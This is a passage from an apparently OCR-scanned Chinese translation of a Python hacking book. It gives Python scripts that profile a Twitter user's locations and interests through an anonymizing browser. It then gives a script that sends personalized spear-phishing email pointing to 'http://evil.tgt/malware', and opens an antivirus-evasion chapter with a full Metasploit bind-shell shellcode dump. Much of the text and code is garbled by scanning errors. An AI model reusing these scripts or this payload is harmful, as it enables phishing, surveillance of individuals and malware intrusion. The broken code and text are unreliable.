像 Google，Twitter 给 开发 者 提供 了 API， 该 文档 在 https://dev.twitter.com/docs ， 非 
常 深入 ， 提 供 了 更 多 特点 的 访问 ， 但 在 本 程序 中 用 不 到 。 


让 我 们 探究 以 下 如 何 从 Twitter 检索 数据 。 具 体 来 说 ， 我 们 要 转发 美国 爱国 者 黑客 
th3j35t3r 的 微 博 ， 他 把 Boondock Saint 作 为 自己 的 昵称 。 我 们 将 构 
建 reconPerson() 类 然后 输入 th3j35t3r 作 为 Twitter 的 搜索 关键 字 。 


# coding=UTF-8 


import json 
import urllib 
from anonBrowser import * 


class reconPerson: 
def _ init__(self, first_name, last_name, job='',social_media={} 
self.first_name = first_name 
self.last_name = last_name 
self.job = job 
self.social_media = social_media 
def _ repr_ (self): 
return self.first_name + ' ' + self.last_name + ' has job 
def get_social(self, media_name): 
if self.social_media.has_key(media_name): 
return self.social_media[media_name] 
return None 
def query_twitter(self, query): 
query = urllib.quote_plus(query) 
results = [] 
browser = anonBrowser() 
response = browser .open('http://search.twitter .com/search.: 
json_objects = json.load(response) 
for result in json_objects['results']: 
new_result = {} 
new_result['from_user'] = result['from_user_name'] 
new_result['geo'] = result['geo'] 
new_result['tweet'] = result['text'] 
results.append(new_result ) 
return results 
ap = reconPerson('Boondock', 'Saint') 
print ap.query_twitter('from:th3j35t3r since:2010-01-01 include:ret 


a 


当 进一步 的 继续 检索 Twitter， 我 们 已 经 看 到 了 打 来 那个 的 信息 ， 这 可 能 对 爱国 者 黑 
客 有 用 。 他 正在 和 一 些 黑客 团体 UGNazi 的 支持 者 起 冲突 。 好 奇 心 驱使 我 们 想 知道 
为 什么 会 变 成 这 样 。 





recon:~# python twitterRecon. py 

[{'tweet': u'RT @XNineDesigns: @th3j35t3r Do NOT give up. You are 
the bastion so many of us need. Stay Frosty!!! !!!!!', 'geo': 

None, 'from_user': u'p\u01iddz\u0131u0d\u0250\u01dd\u028d \u029e\ 
uQ2540pu00q'}, {'tweet': u'RT @droogieixp: "Do you expect me to 
talk?" - #UGNazi "No #UGNazi I expect you to die." @th3j35t3r 
#ticktock', 'geo': None, 'from_user': u'p\u@1ddz\u0131u0d\u0250\ 
uOidd\uO28d \uO29e\u02540pu00q'}, {'tweet': u'RT @Tehvar: @th3j35t: 
my thesis paper for my masters will now be focused on supporting tł 
#wwp, while I can not donate money I can give intelligence. ' 
<,..SNIPPED. ,> 


‘ — 








我 硕 望 ， 你 看 到 这 个 代码 的 时 候 在 想 "我 现在 知道 该 怎么 做 了 | "确实 是 这 样 ， 从 互 
联网 上 检索 一 些 特 定 模式 的 信息 之 后 。 显 然 ， 使 用 Twitter 的 结果 没有 用 ， 使 用 他 们 
寻找 目标 的 信息 。 当 谈论 获取 个 人 信息 时 社交 平台 是 一 个 金 矿 。 个 人 的 生日 ， 家 乡 
甚至 家 庭 地 址 ， 电 话 号 码 等 隐秘 的 信息 都 会 被 给 予 不 怀 好 意 的 人 。 人 们 往往 没有 意 
识 到 这 个 问题 ， 使 用 社交 网 站 是 不 安全 的 习惯 。 让 我 们 进一步 的 探究 从 Twitter 的 提 
交 里 面 提取 位 置 数 据 。 


获取 Twitter 的 位 置 数 据 


很 多 Twitter 用 户 遵 守 一 个 不 成 文 的 规定 ， 当 有 创作 时 就 与 全 世界 分 享 。 一 般 来 说 ， 
计算 公式 是 : 【其 他 Twitter 用 户 的 消息 是 针对 】+【 文 本 的 消息 加 上 段 连接 】+ 
【Hash 标 签 】。 其 他 的 信息 可 能 也 包括 ， 但 是 不 在 消息 体内 ， 就 像 图 像 或 者 位 置 。 
然而 ， 退 后 一 步 ， 以 攻击 者 的 眼光 审视 一 下 这 个 公式 ， 对 于 恶意 用 户 这 个 公式 变 成 
T: [AP RK MA > MRA BER RMA) +【 某 人 感 兴 趣 的 链接 或 者 主 
题 ， 他 们 会 对 这 个 主题 的 消息 很 感 兴趣 】+【 某 人 可 能 会 对 这 个 主题 有 更 多 的 了 
解 】。 图 片 或 者 地 理 标 签 不 在 有 用 或 者 是 朋友 的 有 趣 的 花边 新 闻 。 他 们 会 成 为 配置 
中 的 额外 的 细节 ， 例 如 某 人 经 常 去 哪 吃 早餐 。 虽 然 这 可 能 是 一 个 偏执 的 观点 ， 我 们 
将 自动 化 的 收集 从 Twitter 检索 的 每 一 条 信息 。 


# coding=UTF-8 


import json 

import urllib 

import optparse 

from anonBrowser import * 


def get_tweets(handle): 
query = urllib.quote_plus('from:' + handle+ ' since:2009-01-01 
tweets = [] 
browser = anonBrowser( ) 
browser .anonymize( ) 
response = browser.open( 'http://search. twitter .com/search. json‘ 
json_objects = json.load(response) 
for result in json_objects['results']: 
new_result = {} 


new_result['from_user'] = result['from_user_name' ] 
new_result['geo'] = result['geo' ] 
new_result['tweet'] = result['text'] 
tweets.append(new_result ) 

return tweets 


def load_cities(cityFile): 
cities = [] 
for line in open(cityFile).readlines(): 
city=line.strip('\n').strip('\r').lower() 
cities.append(city) 
return cities 


def twitter_locate(tweets, cities): 
locations = [] 


locCnt = 0 
cityCnt = 0 
tweetsText = "" 
for tweet in tweets: 
if tweet['geo'] != None: 
locations.append(tweet['geo' |) 
locCnt += 1 


tweetsText += tweet['tweet'].lower() 
for city in cities: 
if city in tweetsText: 
locations.append(city) 
cityCnt+=1 
print("[+] Found "+str(locCnt)+" locations via Twitter 
return locations 


def main(): 
parser = optparse.OptionParser('usage%prog -u <twitter handle> 
parser.add_option('-u', dest='handle', type='string', help='spe 
parser.add_option('-c', dest='cityFile', type='string', help='s 
(options, args) = parser.parse_args() 
handle = options.handle 
cityFile = options.cityFile 
if (handle==None): 
print parser.usage 
exit(0) 
cities = [] 
if (cityFile!=None): 
Cities = load_cities(cityFile) 
tweets = get_tweets(handle) 
locations = twitter_locate(tweets,cities) 
print("[+] Locations: "+str(locations) ) 


if name == ' _main_': 


main() 
«| E 
我 了 测试 我 们 的 脚本 ， 我 们 建立 了 城市 的 列表 。 








recon:~# cat mlb-cities.txt | more 
baltimore 

boston 

chicago 

cleveland 

detroit 


<,..SNIPPED. ,> 

recon:~# python twitterGeo.py -u redsox -c mlb-cities.txt 

[+] Found © locations via Twitter API and 1 locations from text sez 
[+] Locations: ['toronto'] recon:~# python twitterGeo.py -u nation 
[+] Found © locations via Twitter API and 1 locations from text sez 
[+] Locations: ['denver' ] 





用 正则 表达 式 解 析 Twitter 的 关注 


接 下 来 我 们 将 收集 目标 的 兴趣 ， 这 包括 其 他 用 户 或 者 是 网 路 内 容 。 任 何 时 候 网 站 都 
提供 了 能 力 知 道 用 户 对 什么 感 兴 趣 ， 跳 过 去 ， 这 些 数据 将 成 为 成 功 的 社会 工程 攻击 
的 基础 。 如 我 们 前 面 讨 论 的 ，Twitter 的 兴趣 点 包含 任何 链接 ，Hash 标 签 或 者 是 其 他 
用 户 提 到 的 内 容 。 用 正则 表达 式 找 到 这 些 很 容易 。 


# coding=UTF-8 

import json 

import re 

import urllib 

import urllib2 

import optparse 

from anonBrowser import * 


def get_tweets(handle): 
query = urllib.quote_plus('from:' + handle+ ' since:2009-01-01 
tweets = [] 
browser = anonBrowser( ) 
browser .anonymize( ) 
response = browser.open('http://search. twitter .com/search. json‘ 
json_objects = json.load(response) 
for result in json_objects['results']: 
new_result = {} 
new_result['from_user'] = result['from_user_name' ] 
new_result['geo'] = result['geo' ] 
new_result['tweet'] = result['text'] 
tweets.append(new_result ) 
return tweets 


def find_interests(tweets): 
interests = {} 
interests['links' ] [] 
interests['users'] [] 
interests['hashtags'] = [] 


for tweet in tweets: 
text = tweet['tweet' ] 
links = re.compile('(http.*?)\Z|(http.*?) ').findall(text) 
for link in links: 
if link[0]: 
link = link[0] 
elif link[1]: 
link = link[1] 
else: 
continue 
try: 
response = urllib2.urlopen( link) 
full_link = response.url 
interests['links'].append(full_link) 
except: 
pass 
interests['users'] += re.compile('(@\wt+)').findall(text) 
interests['hashtags'] +=re.compile('(#\wt+)').findall(text) 
interests['users'].sort() 
interests['hashtags'].sort() 
interests['links'].sort() 
return interests 


def main(): 
parser = optparse.OptionParser('usage%prog -u <twitter handle> 
parser.add_option('-u', dest='handle', type='sring', help='spec 
(options, args) = parser.parse_args() 
handle = options.handle 


if handle == None: 
print(parser.usage) 
exit(0) 


tweets = get_tweets(handle) 

interests = find_interests(tweets) 

print('\n[+] Links.') 

for link in set(interests['links']): 
print(' [+] ' + str(link)) 
print('\n[+] Users.') 

for user in set(interests['users']): 
print(' [+] ' + str(user)) 
print('\n[+] HashTags.') 

for hashtag in set(interests['hashtags']): 
print('\n[+] ' + str(hashtag) ) 

if _name__ == '_main_': 
main() 
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运行 我 们 的 兴趣 分 析 脚 本 ， 我 们 看 到 它 解 析出 针对 目标 的 链接 ， 用 户 名 ，Hash 标 
签 。 请 注意 ， 它 返回 了 一 个 Youtube 的 视频 ， 一 些 用 户 名 和 当前 即将 到 来 的 比赛 的 
Hash 标 签 。 好 奇 心 再 一 次 让 我 们 知道 该 怎么 做 。 


recon:~# python twitterInterests.py -u sonnench 
[+] Links. 

[+]http://www. youtube. com/watch?v=K-BIuZtlC7k&amp; feature=plcp 
[+] Users. 

[+] @tomasseeger 

[+] @sonnench 

[+] @Benaskren 

[+] @AirFrayer 

[+] @NEXERSYS 
[+] HashTags. 
[+] #UFC148 
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这 里 使 用 正则 表达 式 不 是 寻找 信息 的 合适 方法 。 正 则 表达 式 抓 住 包含 链接 的 文本 将 
会 错过 某 一 特定 的 URL， 因 为 用 正则 表达 式 很 难 匹 配 所 有 格式 的 URL。 然 而 ， 对 我 
们 而 言 正则 表达 式 99% 的 情况 下 会 工作 。 此 外 ， 使 用 urllib2 库 里 的 函数 打开 链 
接 而 不 是 我 们 的 匿名 类 。 


再 一 次 ， 我 们 将 使 用 使 用 一 个 字典 排序 信息 到 一 个 更 加 易于 管理 的 数据 结构 中 ， 所 
以 我 们 不 需要 创造 一 个 类 。 由 于 Twitter 字符 的 限制 ， 许 多 URL 使 用 某 种 服务 把 URL 
变 短 了 。 这 些 链接 并 不 非常 有 用 ， 因 为 他 们 能 指向 任何 地 方 。 为 了 扩展 他 们 ， 我 们 
将 使 用 urllib2 打开 。 脚 本 打开 页 面 后 ， urllib 能 取 回 整个 URL。 其 他 用 户 和 
Hash 标 签 将 使 用 类 似 的 正则 表达 式 来 检索 。 并 返回 给 主要 的 方法 twitter() 。 位 
置 和 关注 最 后 会 被 调用 得 到 。 

可 以 做 其 他 事情 扩展 处 理 Twitter 的 能 力 。 互 联网 上 有 无 限 的 资源 ， 无 数 中 分 析 数 据 
的 方法 要 求 扩 大 自动 化 收集 信息 程序 的 能 力 。 将 我 们 整个 系列 的 侦查 包装 在 一 起 ， 
我 们 做 了 一 个 类 来 检索 位 置 ， 兴 趣 和 Twitter。 这 些 在 下 一 节 中 将 会 看 到 用 处 的 。 





# coding=UTF-8 

import urllib 

from anonBrowser import * 
import json 

import re 

import urllib2 


class reconPerson: 
def _ init__(self, handle): 
self.handle = handle 
self.tweets = self.get_tweets() 
def get_tweets(self): 
query = urllib.quote_plus('from:' + self.handle+' since: 20( 
tweets = [] 
browser = anonBrowser() 
browser .anonymize( ) 
response = browser.open('http://search. twitter .com/search. : 
json_objects = json.load(response) 
for result in json_objects['results']: 
new_result = {} 
new_result['from_user'] = result['from_user_name' ] 


def 


def 


new_result['geo'] = result['geo'] 
new_result['tweet'] = result['text'] 
tweets .append(new_result ) 
return tweets 
find_interests(self): 
interests = {} 
interests['links' ] [] 
interests['users'] [] 
interests['hashtags'] = [] 
for tweet in self.tweets: 
text = tweet['tweet'] 
links = re.compile('(http.*?)\Z|(http.*?) ').findall(te 
for link in links: 
if link[0]: 
link = link[0] 
elif link[1]: 
link = link[1] 
else:continue 
try: 
response = urllib2.urlopen(link) 
full_link = response.url 
interests['links'].append(full_link) 
except: 
pass 
interests['users'] +=re.compile('(@\w+)').findall(text) 
interests['hashtags'] +=re.compile('(#\w+)').findall(text) 
interests['users'].sort() 
interests['hashtags'].sort() 
interests['links'].sort() 
return interests 
twitter_locate(self, cityFile): 
cities = [] 
if cityFile != None: 
for line in open(cityFile).readlines(): 
city = line.strip('\n').strip('\r').lower() 
cities.append(city) 
locations = [] 
locCnt = 0 
cityCnt = 0 
tweetsText = '' 
for tweet in self.tweets: 
if tweet['geo'] != None: 
locations.append(tweet['geo']) 
locCnt += 1 
tweetsText += tweet['tweet'].lower() 
for city in cities: 
if city in tweetsText: 
locations.append(city) 
cityCnt += 1 
return locations 








匿名 邮件 


越 来 约 频繁 的 ， 网 站 要 求 用 户 创建 并 登陆 账户 ， 如 果 他 们 想 访 问 网 站 的 最 佳 资源 的 
话 。 这 显然 会 出 现 一 个 问题 ， 对 于 传统 的 浏览 用 户 ， 浏 览 互 联网 的 浏览 器 是 不 同 
的 ， 登 陆 显然 破坏 了 匿名 浏览 ， 登 陆 后 的 任何 行为 取决 于 账户 。 大 多 数 网 站 只 需要 
一 个 有 效 的 邮件 地 址 并 不 检查 其 他 的 私人 信息 。 像 雅虎 ，Google 提 供 的 邮箱 服务 是 
免费 的 ， 很 容易 申请 。 然 而 ， 他 们 有 一 些 服务 和 条 款 你 必须 接受 和 理解 。 


一 个 很 好 的 选择 是 使 用 一 个 一 次 性 的 邮箱 账户 获得 一 个 永久 性 的 邮箱 。 十 分 钟 邮 箱 
http://1 Ominutemail.com/10MinuteMail/index.html 提供 一 个 一 次 性 的 邮箱 。 攻 击 者 
可 以 利用 很 难 追 查 的 电子 邮件 创建 不 依赖 他 们 的 账户 。 大 多 数 网 站 最 起 码 的 使 用 条 
款 是 不 允许 收集 其 他 用 户 的 信息 。 虽 然 实际 的 攻击 者 不 遵守 这 些 规定 ， 对 账户 使 用 
这 种 技术 完全 可 以 做 到 。 记 住 ， 虽 然 这 一 技术 可 以 被 用 来 保护 你 ， 你 应 该 采取 行 
动 ， 确 保 你 的 账户 的 行为 安全 。 


大 规模 的 社会 工程 


在 这 一 点 上 ， 我 们 已 经 收集 了 目标 的 大 量 的 有 价值 的 信息 。 利 用 这 些 信 息 自 动 的 生 
成 邮件 是 一 个 复杂 的 事 ， 尤 其 是 添加 了 足够 的 细节 让 他 变 得 可 行 。 在 这 一 点 上 一 个 
选项 可 能 会 让 目前 的 程序 停止 : 这 也 允许 攻击 者 利用 所 有 的 有 用 的 信息 构造 一 个 邮 
件 。 然 而 ， 手 动 发 邮件 给 一 个 大 组 织 的 每 一 个 人 是 不 可 行 的 。Python 的 能 力 允 许 我 
们 的 这 个 过 程 自动 化 并 快速 获得 结果 。 为 了 这 个 目的 ， 我 们 将 使 用 收集 到 的 信息 建 
立 一 个 非常 简单 的 邮件 并 发 送 给 目标 。 


使 用 Smtplib 发 送 邮 件 给 目标 


发 送 电子 邮件 的 过 程 中 通常 需要 开发 客户 的 选择 ， 点 击 新 建 ， 然 后 点 击发 送 。 在 这 
背后 ， 客 户 端 连接 到 服务 器 ， 可 能 记录 了 上 日志， 交换 信息 的 发 送 人 ， 收 件 人 和 其 他 
必要 的 资料 。Python 的 Smtplib 库 将 在 程序 中 处 理 这 些 过 程 。 我 们 将 通过 建立 一 
个 Python 的 电子 邮件 客户 端 发 送 我 们 的 恶意 邮件 给 目标 。 这 个 客户 端 很 基本 ， 但 让 
我 们 在 程序 中 发 送 邮 件 很 简单 。 我 们 这 次 的 目的 ， 我 们 将 使 用 Google 的 邮件 SMTP 
服务 ， 你 需要 创建 一 个 Google 邮 件 账 户 ， 在 我 们 的 脚本 中 使 用 ， 或 者 使 用 自己 的 
SMTPIR 4 Š 。 


import smtplib 
from email.mime.text import MIMEText 


def sendMail(user, pwd, to, subject, text): 

msg = MIMEText(text) 

msg['From'] = user 

msg['To'] = 

msg[ 'Subject'] = subject 

try: 
smtpServer = smtplib.SMTP('smtp.gmail.com', 587) 
print("[+] Connecting To Mail Server.") 
smtpServer.ehlo() 
print("[+] Starting Encrypted Session.") 
smtpServer.starttls() 
smtpServer.ehlo() 
print("[+] Logging Into Mail Server.") 
smtpServer.login(user, pwd) 
print("[+] Sending Mail.") 
smtpServer.sendmail(user, to, msg.as_string()) 
smtpServer .close() 
print("[+] Mail Sent Successfully.") 


except: 
print("[-] Sending Mail Failed.") 
user = 'username' 
pwd = 'password' 


sendMail(user, pwd, 'target@tgt.tgt', 'Re: Important', 'Test Messac 
二 aF 
运行 脚本 ， 检 查 我 们 的 邮箱 ， 我 们 可 以 看 到 成 功 的 发 送 了 邮件 。 





recon:# python sendMail.py 

[+] Connecting To Mail Server. 
[+] Starting Encrypted Session. 
[+] Logging Into Mail Server. 
[+] Sending Mail. 

[+] Mail Sent Successfully. 


供 了 有 效 的 邮件 服务 器 和 参数 ， 客 户 端 将 正确 的 发 送 邮 件 给 目标 。 有 许多 的 邮件 
WO 不 带 开 转 发 ， 我 们 只 能 发 送 邮 件 到 就 特定 的 地 址 。 在 本 地 的 邮件 服 
务 中 设置 转发 ， 或 者 在 互联 网 上 打开 转发 。 将 能 发 送 邮件 从 任何 地 址 到 任何 地 址 ， 
发 送 方 的 地 址 甚至 可 以 是 无 效 的 。 


垃圾 邮件 的 发 送 者 使 用 相同 的 技术 发 送 邮 件 来 自 Potus@whitehouse.gov : 他 们 
简单 的 伪造 了 发 送 地 址 。 很 少 有 人 会 打开 来 自 TRAMP ANTAM 
发 送 地 址 是 关键 。 使 用 客 P HATH > ， 是 攻击 者 从 一 个 看 起 来 值得 
么 的 地 址 发 送 邮件 ， 增 加 用 户 点 开 邮 件 的 可 能 


用 Smtplib 进 行 鱼 又 式 网 络 钓鱼 


a E 
起 来 像 目标 朋友 发 来 的 电子 邮件 ， 目 标 发 现 一 些 有 趣 的 事情 ， 邮 件 看 起 来 是 

的 。 大 量 的 研究 投入 到 帮助 电脑 的 a SASH TEER ER 
善 。 为 了 减少 这 种 可 能 性 ， 我 们 将 创建 一 个 包 人 钨 攻击 荷载 的 的 简单 的 信息 邮件 。 程 
py ence 将 涉及 选择 包 含 这 条 信息 。 我 们 的 程序 将 按 数据 随机 的 选择 。 采 
取 地 步骤 是 : 这 择 座 假 的 发 件 人 地 址 ， 制作 一 个 主题 ， 创 建 一 个 信息 ， 然 后 发 送 电 
子 邮 件 。 幸 运 的 是 创建 发 送 人 和 主题 是 相当 的 简单 。 


代码 的 if 语 句 仔细 的 处 理 和 如 何 将 短信 息 连 接 在 一 起 是 很 重要 的 问题 。 当 处 理 数 量 

巨大 的 可 能 性 时 ， ee 情 Rr a ， 每 一 个 可 能 性 会 被 分 为 
独立 的 函数 。 每 一 个 方法 将 以 特定 的 的 方法 承担 一 块 的 开始 和 结束 ， 然 后 独立 与 其 

他 代码 的 操作 。 这 样 ， 收 集 到 某 人 的 信息 就 越 多 ， 唯 一 改变 的 是 方法 。 最 后 一 一 步 是 
通过 我 们 的 电子 邮件 客户 端 ， 相 信 它 的 人 思 齐 的 做 剩 下 的 活 。 这 个 过 程 的 没 一 部 分 
在 这 一 章 中 都 讨论 过 ， 这 是 任何 被 用 来 获取 权限 的 钓鱼 网 站 的 产物 。 在 我 们 的 例子 
中 ， 我 们 简单 的 发 送 一 个 名 不 副 实 的 链接 ， 有 效 荷 载 可 以 是 附件 或 者 是 诈骗 网 站 ， 
或 者 任何 其 他 的 攻击 方法 。 这 个 过 程 将 对 每 一 个 成 员 重 复 ， 只 要 一 个 人 上 当 攻 击 者 
就 能 获取 权限 。 我 们 特定 的 脚本 将 攻击 一 个 用 户 基于 他 公开 的 信息 。 基 于 他 的 地 

点 ， 用 户 ，Hash 标 签 ， 链 接 ， 脚 本 将 创建 一 个 附带 和 恶意 链接 的 邮件 等 待 用 户 点 击 。 


# coding=UTF-8 

import smtplib 

import optparse 

from email.mime.text import MIMEText 
from twitterClass import * 

from random import choice 


def sendMail(user, pwd, to, subject, text): 

msg = MIMEText(text) 

msg['From'] = user 

msg['To'] = to 

msg['Subject'] = subject 

try: 
smtpServer = smtplib.SMTP('smtp.gmail.com', 587) 
print("[+] Connecting To Mail Server.") 
smtpServer.ehlo() 
print("[+] Starting Encrypted Session.") 
smtpServer.starttls() 
smtpServer .ehlo() 
print("[+] Logging Into Mail Server.") 
smtpServer.login(user, pwd) 
print("[+] Sending Mail.") 
smtpServer.sendmail(user, to, msg.as_string()) 
smtpServer.close() 
print("[+] Mail Sent Successfully.") 

except: 
print("[-] Sending Mail Failed.") 


def main(): 
parser = optparse.OptionParser('usage%prog -u <twitter target> 
parser.add_option('-u', dest='handle', type='string', help='spe 
parser.add_option('-t', dest='tgt', type='string', help='specit 


parser.add_option('-1', dest='user', type='string', help='spec: 
parser.add_option('-p', dest='pwd', type='string', help='specii 
(options, args) = parser.parse_args() 

handle = options.handle 

tgt = options.tgt 

user = options.user 

pwd = options.pwd 


if handle == None or tgt == None or user ==None or pwd==None: 
print(parser.usage) 
exit(0) 


print("[+] Fetching tweets from: "+str(handle) ) 

spamTgt = reconPerson(handle) 

spamTgt.get_tweets() 

print("[+] Fetching interests from: "+str(handle) ) 

interests = spamTgt.find_interests() 

print("[+] Fetching location information from: "+ str(handle) ) 
location = spamTgt.twitter_locate('mlb-cities.txt') 

SpamMsg = "Dear "+tgt+"," 

if (location!=None): 

randLoc=choice(location) 

spamMsg += " Its me from "+randLoc+"." 
if (interests['users']!=None): 

randUser=choice(interests['users']) 

spamMsg += " "+randUser+" said to say hello." 
if (interests[ 'hashtags']!=None): 

randHash=choice(interests[ 'hashtags' ]) 

spamMsg += " Did you see all the fuss about "+ randHash+"?' 
if (interests['links']!=None): 

randLink=choice(interests['links']) 

SpamMsg += " I really liked your link to: "+randLink+"." 
spamMsg += " Check out my link to http://evil.tgt/malware" 
print("[+] Sending Msg: "+spamMsg) 
sendMail(user, pwd, tgt, 'Re: Important', spamMsg) 


—_main__': 


if _ name == 
main() 





测试 我 们 的 脚本 ， 我 们 可 以 获得 一 些 关于 Boston Red Sox 的 信息 ， 从 他 的 Twitter 账 
户 上 ， 为 了 发 送 一 个 恶意 的 垃圾 邮件 。 


recon# python sendSpam.py -u redsox -t target@tgt -l username -p pi 
[+] Fetching tweets from: redsox 

[+] Fetching interests from: redsox 

[+] Fetching location information from: redsox 

[+] Sending Msg: Dear redsox, Its me from toronto. @davidortiz saic 
[+] Connecting To Mail Server. 

[+] Starting Encrypted Session. 

[+] Logging Into Mail Server. 

[+] Sending Mail. 

[+] Mail Sent Successfully. 
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本 章 总 结 


虽然 这 个 方法 不 是 用 于 另 一 个 人 或 者 组 织 ， 但 它 对 认识 其 可 行 性 和 组 织 的 脆弱 性 很 
重要 。Python 和 其 他 脚本 语言 SAHA Ht RR AELAD k > RAMEKA ER 
到 的 广阔 的 资源 ， 来 获取 淤 在 的 利益 益 。 在 我 们 的 代码 中 ， 我 创建 了 一 个 类 来 模拟 浏 
览 器 同 时 增加 了 匿名 访问 ， 检 索 网 站 ， 使 用 强大 的 Google， 利 用 Twitter 来 了 解 目标 
的 更 多 信息 功能 ， 然 后 把 所 有 的 细节 发 送 一 个 特殊 的 电子 邮件 给 目标 用 户 。 互 联网 
限制 了 程序 ， 线 程 的 菜 些 函数 将 大 大 的 减少 执行 时 间 。 此 外 ， 一 旦 我 们 

会 了 如 何 从 数据 源 中 检索 信息 ， 对 其 他 网 站 做 同样 的 信息 是 很 简单 的 。 个 人 美誉 
访问 和 处 理 互 联网 上 大 量 的 信息 的 & 力 ， 但 是 强大 的 Python 和 它 的 库 允 许 访 问 每 一 
资源 的 能 力 远 和 远 高 于 几 个 熟练 的 人 员 。 知 道 这 一 切 ， 攻 击 不 是 你 想象 中 的 那么 复 
杂 ， 你 的 ene thee ? 什么 公开 的 信息 可 以 被 攻击 者 使 用 ? 你 会 成 为 一 个 
Python 检索 信息 息 和 恶意 邮件 的 受害 者 吗 ? 








第 七 草 躲避 杀毒 系统 


本 章 内 容 : 

使 用 Python Ctypes 工作 

使 用 Python 躲避 杀毒 软件 

使 用 Pyinstaller 构建 Win32 可 执行 程序 
. 利用 HTTPLib A 请 求 
.和 在 线 病毒 扫描 交 


这 是 一 个 “小 男人 ”要 向 你 证 明 的 事情 ， 无 论 你 多 么 强大 ， 无 论 你 多 么 疯狂 ， 你 
都 必须 接受 失败 | 


ARONA 


> 


—Saulo Ribeiro DH ZA 六 次 世界 冠军 


简介 : Flame ! 


2012 年 5 月 28 日 ， 伊 朗 的 Maher 中 心 检测 到 了 一 个 复杂 精妙 的 计算 机 网 络 攻击 。 
这 个 攻击 是 此 次 的 复杂 ，43 种 杀毒 引擎 的 43 种 测试 也 无 法 辨认 出 在 攻击 中 使 用 的 
恶意 代码 。 发 现 一 些 ASCI| 字符 串 出 现在 代码 中 后 将 它 称 为 Flame， 和 恶意 软件 出 现 
的 感染 的 系统 是 伊朗 的 | T 。 编译 Lua 脚本 命名 为 : Beetlejuice, 
Microbe, Frog, Snack, and Gator， 和 恶意 软件 偷偷 的 通过 蓝牙 记录 音频 ， 感 业 附 近 
的 机 器 ， 上 传 截图 和 数据 到 远 元 程 的 控制 命 TA 分 服务 器 o 


估计 恶意 软件 已 经 使 用 两 年 了 ，Kapersky 实验 室 很 快 的 解释 说 Flame 是 “迄今 为 止 

SARE cee 。 它 很 大 并 且 难 以 置信 的 复杂 。 然 而 ， 如 何 做 到 防 病毒 软 
件 无 法 检测 到 它 至 少 两 年 了 ? 他 们 没有 检测 到 它 是 因为 大 多 数 杀 毒 软件 只 要 是 将 基 
于 签名 检测 作为 主要 的 检测 方法 。 尽管 一 些 厂商 开始 采取 一 些 更 复杂 的 方法 如 局 发 
式 或 者 名 誉 度 ， 但 这 些 依然 是 性 概念 。 


在 最 后 一 章 ， 我 们 将 创建 一 个 杀毒 软件 来 躲避 杀毒 引擎 。 DR ee Vem 
Baggett 实现 的 ， 大 约 一 年 前 它 分 享 了 他 的 方法 。 然 而 ， 绕 过 杀毒 软件 的 方法 在 本 
章 的 写作 时 间 时 任 然 可 用 。 注 意 到 Flame， 使 用 了 编译 的 Lua 脚本 。 我 们 将 实现 
Mark 的 方法 ， 编 译 Python 脚本 为 Windows 可 执行 程序 ， 为 了 躲避 杀毒 软件 。 


躲避 杀毒 软件 


为 了 创建 恶意 软件 ， 我 们 需要 恶意 代码 。Metasploit 框架 包含 了 一 个 恶意 代码 库 。 
我 们 可 以 使 用 Metasploit 生成 一 些 C 风格 的 ShellCode 作为 恶意 软件 的 攻击 荷载 。 
我 们 将 使 用 简单 的 Windows 绑 定 shell， 将 绑 定 cmd.exe 到 TCP 端口 : 这 允许 攻 
击 者 远程 连接 到 主机 并 发 出 命令 和 cmd.exe 程序 相交 互 。 


attacker:~# msfpayload windows/shell_ bind_tcp LPORT=1337 C 
ips 
* windows/shell_bind_tcp - 341 bytes 
* http://www.metasploit.com 
* VERBOSE=false, LPORT=1337, RHOST=, EXITFUNC=process, 
* InitialAutoRunScript=, AutoRunScript= 
S 
unsigned char buf[] = 
"\xfc\xe8\x89\x00\xOO\x00\x60\x89\xe5\xX31\xd2\x64\x8b\x52\x30" 
"\xX8b\x52\xOC\x8b\xX52\xX14\xX8D\X72\xX28\xOF\xb7\x4a\x26\X31\x FF" 
"\X31\xcO\xac\x3c\x61\x7C\xO2\x2C\x20\xc1\xcf\xOd\x01\xc7\xe2" 
"\XFO\x52\x57\x8b\x52\x10\x8b\xX42\x3c\xO1\xdO\x8b\x40\x78\x85" 
"\xcO\xX74\x4a\x01\xdO\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" 
"\X3c\x49\x8bD\xX34\x8b\xO1\xd6\x31\xFF\x31\xcO\xac\xci\xcf\x0d" 
"\X01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" 
"\x8b\x58\x24\x01\xd3\x66\x8b\xOc\x4b\x8b\x58\xic\x01\xd3\x8b" 
"\X04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" 
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" 
"\X77\X73\X32\X5F\X54\X68\X4C\X7 7\X26\XO7\xXFF\xd5\xb8\x90\x01" 
"\xXOO\xOO\x29\xc4\x54\x50\xX68\X29\x8O0\x6D\xOO\xFF\xd5\x50\x50" 
"\x50\x50\x40\x50\x40\x50\x68\xea\xOF\xdF\ xeO\xFF\xd5\x89\xc7" 
"\X31\xdb\x53\x68\x02\x00\xXO5\x39\x89\xe6\x6a\xLO\xX56\xX57\x68" 
"\xc2\xdb\x37\x67\xf F\xd5\x53\x57\x68\xb7\xe9\x38\xFF\XFFI\xd5" 
"\xX53\x53\x57\x68\xX74\xec\x3b\xe1\xFF\xd5\x57\x89\xc7\x68\x75" 
"\x6e\x4d\x61\xfF\xd5\x68\x63\x6d\x64\x00\x89\xe3\xX57\X57\x57" 
"\X31\xF6\x6a\x12\x59\x56\xe2\xXFd\x66\xXC7\xX44\x24\x3c\xO1\x01" 
"\xX8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" 
"\xX56\x56\x53\x56\x68\xX79\xcc\xX3F\xX86\ xf F\xd5\x89\xeO\x4e\x56" 
"\X46\XFF\X30\x68\x08\x87\x1d\x60\xFF\xd5\xbb\xfO\xb5\xa2\x56" 
"\x68\xa6\x95\xbd\x9d\xf F\xd5\x3c\xO6\x7c\xOa\x80\xfb\xeO\x75" 
"\xXO5\xbb\x47\x13\x72\x6F\x6a\xOO\xX53\xFF\xd5"; 


SSS -LA 
接 下 来 ， 我 们 写 一 个 脚本 执行 这 个 C Mis shellcode ° Python 允许 导入 外 来 函数 的 
库 。 我 们 可 以 导入 ctypes 库 ， 它 允许 我 们 和 C 语言 的 数据 类 型 交互 。 定 义 一 个 


